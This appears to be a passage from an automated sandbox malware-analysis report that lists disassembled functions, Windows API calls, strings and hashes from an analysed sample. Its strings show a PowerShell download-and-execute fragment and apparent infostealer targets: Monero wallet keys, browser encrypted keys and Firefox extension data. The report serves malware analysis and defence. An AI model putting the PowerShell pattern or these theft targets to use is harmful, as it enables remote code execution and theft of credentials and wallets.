                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00A82D04
                                  • ')", xrefs: 00A82CB3
                                  • <, xrefs: 00A82D39
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: 00247b9a33f1ead60e8290d4613df1895e402eeb8edfd59355b545d8d5ce5a1d
                                  • Instruction ID: b446a1e40d832cf153428e39e770122ae4c74b500c938e78efda2144dcaf6729
                                  • Opcode Fuzzy Hash: 00247b9a33f1ead60e8290d4613df1895e402eeb8edfd59355b545d8d5ce5a1d
                                  • Instruction Fuzzy Hash: 6C419E71D102089AEB18FBA0C991FEDBB74BF24340F50455AE116B7191DF786A4ACFA1
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00A79F41
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$AllocLocal
                                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                  • API String ID: 4171519190-1096346117
                                  • Opcode ID: e43b3c882c8bd764a79c3c6e8e669bae6b0aa5621cbb22924586f21480a2877c
                                  • Instruction ID: 04871f94a63eca2d09d6fbadf6d09dc697b7283b05bb7afa0534647e5d62776c
                                  • Opcode Fuzzy Hash: e43b3c882c8bd764a79c3c6e8e669bae6b0aa5621cbb22924586f21480a2877c
                                  • Instruction Fuzzy Hash: 08613E71A00248ABDB18EFA4CD96FED77B5BF54340F00C518F90A9B591EB746A06CB92
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 00A8696C
                                  • sscanf.NTDLL ref: 00A86999
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00A869B2
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00A869C0
                                  • ExitProcess.KERNEL32 ref: 00A869DA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: 498c0a500d9a46e9d7c0505fa7f96530378ef66457b4577f15f6a0925bd94380
                                  • Instruction ID: acf5ed9a6e300e1f10b5326cd71e5e3317946873f4ff6237611cd47ced93820b
                                  • Opcode Fuzzy Hash: 498c0a500d9a46e9d7c0505fa7f96530378ef66457b4577f15f6a0925bd94380
                                  • Instruction Fuzzy Hash: 9621DC75D14208ABDF04EFE4D945AEEB7B9FF48300F04856EE406E3250EB355605CB65
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A87E37
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A87E3E
                                  • RegOpenKeyExA.ADVAPI32(80000002,0067BBE8,00000000,00020119,?), ref: 00A87E5E
                                  • RegQueryValueExA.ADVAPI32(?,0068D9A0,00000000,00000000,000000FF,000000FF), ref: 00A87E7F
                                  • RegCloseKey.ADVAPI32(?), ref: 00A87E92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: ef16604fa7ac113bdd3f43fdd5c92f00792c26fda4c9be072cf63140b2c5ff28
                                  • Instruction ID: e7cf95f164d1910f141e63f99e77176e288a812930f1c3e46a1d7bad52613b8e
                                  • Opcode Fuzzy Hash: ef16604fa7ac113bdd3f43fdd5c92f00792c26fda4c9be072cf63140b2c5ff28
                                  • Instruction Fuzzy Hash: 19115EB1A44205FBDB04DF94DD49FBFBBB8FB04B10F204259F605A7680D77558008BA1
                                  APIs
                                  • StrStrA.SHLWAPI(0068E8B0,?,?,?,00A8140C,?,0068E8B0,00000000), ref: 00A8926C
                                  • lstrcpyn.KERNEL32(00CBAB88,0068E8B0,0068E8B0,?,00A8140C,?,0068E8B0), ref: 00A89290
                                  • lstrlen.KERNEL32(?,?,00A8140C,?,0068E8B0), ref: 00A892A7
                                  • wsprintfA.USER32 ref: 00A892C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: 4e656ca32535366bf5c2697ccf94f04793ac140f2c2699c07a170b881f0daef7
                                  • Instruction ID: f5178777421f907c5476ee5c448152d1d7500e15684985ffe2d48b0fdc57356d
                                  • Opcode Fuzzy Hash: 4e656ca32535366bf5c2697ccf94f04793ac140f2c2699c07a170b881f0daef7
                                  • Instruction Fuzzy Hash: 90011E75500108FFCB04DFECC988EEE7BB9EB48351F148248F9499B200C631AA40DB91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A712B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A712BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00A712D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00A712F5
                                  • RegCloseKey.ADVAPI32(?), ref: 00A712FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: e0095dfa1d74cd2e81cdbd4cecaf8a535ca503048f30518a134bdcb91ce4e130
                                  • Instruction ID: 6cfa67787201e8abca93008d2ae2583bff6225b3508d210314dbbc17f9ba7621
                                  • Opcode Fuzzy Hash: e0095dfa1d74cd2e81cdbd4cecaf8a535ca503048f30518a134bdcb91ce4e130
                                  • Instruction Fuzzy Hash: C001E6B5A40208BBDB04DFD4DC59FAEB7BCEB48705F108155FA45972C0DA759A018F91
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Type
                                  • String ID:
                                  • API String ID: 2109742289-3916222277
                                  • Opcode ID: bd51a414794bbe7ddc18894878df64802c8a2ba7c6e937cb12be8fecf10c55d2
                                  • Instruction ID: 89c2d994d7e859270c3f38e76e7e604463a5b380ad4be234d07b05dfe83f0539
                                  • Opcode Fuzzy Hash: bd51a414794bbe7ddc18894878df64802c8a2ba7c6e937cb12be8fecf10c55d2
                                  • Instruction Fuzzy Hash: 5C4106B110079C5EDB21AB24CD85FFBBBF89F45718F1444E8E9CA86182E2719A44CF30
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00A86663
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00A86726
                                  • ExitProcess.KERNEL32 ref: 00A86755
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: fe1b690dd264026c08aba21bf98831d6e450346d81687c64783d5ca9970b452b
                                  • Instruction ID: 5b8eb689a94f0373838595f57b857a780a685f1866c332c3fd61bfdd0f72dcaa
                                  • Opcode Fuzzy Hash: fe1b690dd264026c08aba21bf98831d6e450346d81687c64783d5ca9970b452b
                                  • Instruction Fuzzy Hash: 633129B1D01218AAEB14FB90DD92BDEB778AF14300F804189F20967191DF786B49CF6A
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00A90E28,00000000,?), ref: 00A8882F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A88836
                                  • wsprintfA.USER32 ref: 00A88850
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: 635d0a3295cc16d9bc4d469f76f2b712c6ef0a1604bda0da31db020bc31f4242
                                  • Instruction ID: 4093c47d78b3cfbc39e55df253e66b9365cf909ef85e25db02c8889414ee1904
                                  • Opcode Fuzzy Hash: 635d0a3295cc16d9bc4d469f76f2b712c6ef0a1604bda0da31db020bc31f4242
                                  • Instruction Fuzzy Hash: F7211FB1A44208BFDB04DF98DD49FAEBBB8FB48711F104619F645A76C0C779A901CBA1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00A8951E,00000000), ref: 00A88D5B
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A88D62
                                  • wsprintfW.USER32 ref: 00A88D78
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 769748085-2783943728
                                  • Opcode ID: 10483da2fce5441bb0f368e38b76638ca317634a21fd55468f9b82e4ddc7da1b
                                  • Instruction ID: d95c78040b81ff14059fa42b4319efdadfc2f7dafd42f49a1990f5e6483ec22d
                                  • Opcode Fuzzy Hash: 10483da2fce5441bb0f368e38b76638ca317634a21fd55468f9b82e4ddc7da1b
                                  • Instruction Fuzzy Hash: 8DE0ECB5A44208BFDB10DB94DD0EF6D77BCEB44702F004294FD4997680EA729E109B96
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                    • Part of subcall function 00A88B60: GetSystemTime.KERNEL32(00A90E1A,0068E2E8,00A905AE,?,?,00A713F9,?,0000001A,00A90E1A,00000000,?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A88B86
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A7A2E1
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 00A7A3FF
                                  • lstrlen.KERNEL32(00000000), ref: 00A7A6BC
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                  • DeleteFileA.KERNEL32(00000000), ref: 00A7A743
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: e0864644a8ae24d473428235f1f3b79fee90516eb3cf78a7b9273d2824f2a27b
                                  • Instruction ID: 1ef85a82270610b553e21c38054a506cec8f208dc5547512975b63c3cddcb935
                                  • Opcode Fuzzy Hash: e0864644a8ae24d473428235f1f3b79fee90516eb3cf78a7b9273d2824f2a27b
                                  • Instruction Fuzzy Hash: DAE1D472D101189AEB05FBA4DE92EEE733CAF64300F50855AF51776091EF386A49CB72
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                    • Part of subcall function 00A88B60: GetSystemTime.KERNEL32(00A90E1A,0068E2E8,00A905AE,?,?,00A713F9,?,0000001A,00A90E1A,00000000,?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A88B86
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A7D481
                                  • lstrlen.KERNEL32(00000000), ref: 00A7D698
                                  • lstrlen.KERNEL32(00000000), ref: 00A7D6AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 00A7D72B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: e2a749375f90571f772b2972e8cf1e34bca38699193a31721595ff3dabdae5ea
                                  • Instruction ID: 99355752618a5c85dc933472b0400421357cfc7cdff20270cd2d9e35834beb69
                                  • Opcode Fuzzy Hash: e2a749375f90571f772b2972e8cf1e34bca38699193a31721595ff3dabdae5ea
                                  • Instruction Fuzzy Hash: 0291E772D101049BEB08FBA4DE96EEE7338AF64300F50455AF517B6051EF386A49CB72
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                    • Part of subcall function 00A88B60: GetSystemTime.KERNEL32(00A90E1A,0068E2E8,00A905AE,?,?,00A713F9,?,0000001A,00A90E1A,00000000,?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A88B86
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A7D801
                                  • lstrlen.KERNEL32(00000000), ref: 00A7D99F
                                  • lstrlen.KERNEL32(00000000), ref: 00A7D9B3
                                  • DeleteFileA.KERNEL32(00000000), ref: 00A7DA32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: c1247381cc89ec5be16e1f477c7893d52e94a0484c940dc09c8cabb3320555f5
                                  • Instruction ID: 7f133153090e33ff260760fd74fc884a6c8e14f63bd0c60b26609b8a4c1e5f8d
                                  • Opcode Fuzzy Hash: c1247381cc89ec5be16e1f477c7893d52e94a0484c940dc09c8cabb3320555f5
                                  • Instruction Fuzzy Hash: 4781E172D101049AEB08FBA4DE96EEE7378BF64300F50455AF517B6091EF386A09CB72
                                  APIs
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                    • Part of subcall function 00A799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A799EC
                                    • Part of subcall function 00A799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A79A11
                                    • Part of subcall function 00A799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A79A31
                                    • Part of subcall function 00A799C0: ReadFile.KERNEL32(000000FF,?,00000000,00A7148F,00000000), ref: 00A79A5A
                                    • Part of subcall function 00A799C0: LocalFree.KERNEL32(00A7148F), ref: 00A79A90
                                    • Part of subcall function 00A799C0: CloseHandle.KERNEL32(000000FF), ref: 00A79A9A
                                    • Part of subcall function 00A88E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A88E52
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00A91580,00A90D92), ref: 00A7F54C
                                  • lstrlen.KERNEL32(00000000), ref: 00A7F56B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  • Opcode ID: aba5be2f666638bedf0663ea08ad4480223d85d30ea7dd7d696e508af4ee456f
                                  • Instruction ID: 1fe16285adfe2665518b30ac27f8dc6b841ddb23daa4ce23ad8c4bf26ebafca7
                                  • Opcode Fuzzy Hash: aba5be2f666638bedf0663ea08ad4480223d85d30ea7dd7d696e508af4ee456f
                                  • Instruction Fuzzy Hash: D351F472D10108ABEB04FBB4DD96DED7779AF64300F508529F416A7191EF386A09CBB2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: 5afd1924775a700ca37d0912f73280ed400d8e16d496c5b830d90052d9a06256
                                  • Instruction ID: fa66c02b56c74fb17aa4017c9b64bf8008ff9fd95618725c01a87301cfb27062
                                  • Opcode Fuzzy Hash: 5afd1924775a700ca37d0912f73280ed400d8e16d496c5b830d90052d9a06256
                                  • Instruction Fuzzy Hash: FF414F72D10109AFDF04FFA4D945AFEB7B4BF54704F008429E416A6290EB75AA05CFA1
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A799EC
                                    • Part of subcall function 00A799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A79A11
                                    • Part of subcall function 00A799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A79A31
                                    • Part of subcall function 00A799C0: ReadFile.KERNEL32(000000FF,?,00000000,00A7148F,00000000), ref: 00A79A5A
                                    • Part of subcall function 00A799C0: LocalFree.KERNEL32(00A7148F), ref: 00A79A90
                                    • Part of subcall function 00A799C0: CloseHandle.KERNEL32(000000FF), ref: 00A79A9A
                                    • Part of subcall function 00A88E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A88E52
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00A79D39
                                    • Part of subcall function 00A79AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A74EEE,00000000,00000000), ref: 00A79AEF
                                    • Part of subcall function 00A79AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00A74EEE,00000000,?), ref: 00A79B01
                                    • Part of subcall function 00A79AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A74EEE,00000000,00000000), ref: 00A79B2A
